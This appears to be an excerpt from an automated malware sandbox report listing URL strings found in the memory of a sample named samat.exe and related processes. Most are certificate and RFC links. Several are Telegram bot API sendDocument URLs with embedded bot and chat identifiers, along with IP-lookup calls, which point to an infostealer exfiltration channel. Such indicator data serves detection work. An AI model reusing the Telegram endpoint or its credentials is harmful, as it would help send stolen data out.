                    Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                    Source: samat.exe, 00000008.00000002.4561716513.000001BCCCB00000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
                    Source: svchost.exe, 00000019.00000002.6314363798.0000022FAD702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                    Source: samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
                    Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4563998531.000001BCCD441000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550085157.000001BCCD43D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76
                    Source: samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4561108918.000001BCCCA7C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCA76000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC834000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCA79000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4559388808.000001BCCC857000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCA79000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499341916.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529948916.000001BCCC84F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529095803.000001BCCC843000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCA78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc4880
                    Source: samat.exe, 00000008.00000002.4565677561.000001BCCDDBC000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4565677561.000001BCCDDE4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5234
                    Source: samat.exe, 00000008.00000002.4565419860.000001BCCDB6C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5297
                    Source: samat.exe, 00000008.00000003.4534182312.000001BCCD3E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5869
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
                    Source: samat.exe, 00000008.00000002.4565677561.000001BCCDDBC000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4565677561.000001BCCDDE4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6455#section-5.2
                    Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550085157.000001BCCD43D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4563798977.000001BCCD40E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
                    Source: samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
                    Source: samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550021328.000001BCCCAC9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4547576732.000001BCCCAB1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4561290600.000001BCCCACD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526519071.000001BCCCAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
                    Source: samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
                    Source: samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550021328.000001BCCCAC9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4547576732.000001BCCCAB1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4561290600.000001BCCCACD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526519071.000001BCCCAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crlD
                    Source: samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
                    Source: samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
                    Source: samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm2
                    Source: samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
                    Source: samat.exe, 00000007.00000003.2997340150.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/
                    Source: samat.exe, 00000007.00000003.2999845052.00000209A4401000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2997340150.00000209A4400000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2997340150.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4564064125.000001BCCD44C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499341916.000001BCCC9FF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4560683562.000001BCCCA03000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4532754927.000001BCCCA03000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4530993878.000001BCCD44A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527548212.000001BCCCA03000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4563798977.000001BCCD40E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: samat.exe, 00000008.00000002.4561716513.000001BCCCB00000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3020584454.000001BCCC37F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024391863.000001BCCC374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
                    Source: samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
                    Source: samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527808216.000001BCCC98D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514102538.000001BCCC983000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517233682.000001BCCC984000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/t
                    Source: samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4563930588.000001BCCD439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
                    Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                    Source: samat.exe, 00000008.00000003.4519025828.000001BCCD377000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513874113.000001BCCC714000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4518791762.000001BCCC718000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4558325205.000001BCCC719000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514877809.000001BCCD360000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4509940106.000001BCCC711000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
                    Source: samat.exe, 00000008.00000003.3025267001.000001BCCC8ED000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503744422.000001BCCC8A7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC8ED000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025997180.000001BCCC89B000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4520994875.000001BCCC8D4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4510392887.000001BCCC8BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8A9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC8C4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                    Source: samat.exe, 00000008.00000003.4551443074.000001BCCCAC3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4547576732.000001BCCCAB1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526519071.000001BCCCAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
                    Source: samat.exe, 00000008.00000003.4520729290.000001BCCCAD5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                    Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550085157.000001BCCD43D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4563798977.000001BCCD40E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rfc-editor.org/info/rfc7253
                    Source: samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550085157.000001BCCD43D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
                    Source: samat.exe, 00000008.00000003.4523890696.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531671427.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502168541.000001BCCC995000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
                    Source: chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                    Source: chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
                    Source: chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard7
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.myip.com
                    Source: samat.exe, 00000008.00000002.4566260781.000001BCCDE80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.myip.com/
                    Source: samat.exe, 00000008.00000002.4566260781.000001BCCDE80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.myip.com/0
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: samat.exe, 00000008.00000002.4565677561.000001BCCDE58000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8095725853/sendDocument
                    Source: samat.exe, 00000008.00000002.4565419860.000001BCCDC34000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8095725853/sendDocument?chat_id=7027613045%3AAAGX3rPO-1UHB195if6JIXakjYP
                    Source: samat.exe, 00000008.00000002.4565419860.000001BCCDC34000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8095725853/senddocument?chat_id=7027613045%3aaagx3rpo-1uhb195if6jixakjyp
                    Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.jaraco.com/skeleton
                    Source: samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue44497.
                    Source: chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                    Source: chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
                    Source: chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
